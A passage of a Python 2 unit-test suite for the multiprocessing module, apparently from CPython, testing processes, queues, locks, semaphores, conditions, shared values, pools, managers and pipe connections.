p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
from multiprocessing import forking
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
self.skipTest("requires 'queue.task_done()' method")
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporaily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), True)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
countdown = 5
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
#
# Test that manager has expected number of shared objects left
#
class _TestZZZNumberOfObjects(BaseTestCase):
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
multiprocessing.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
debug_info = self.manager._debug_info()
if refs != EXPECTED_NUMBER:
print self.manager._debug_info()
print debug_info
self.assertEqual(refs, EXPECTED_NUMBER)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.start()
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
#
# Test of sending connection and socket objects between processes
#
"""
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
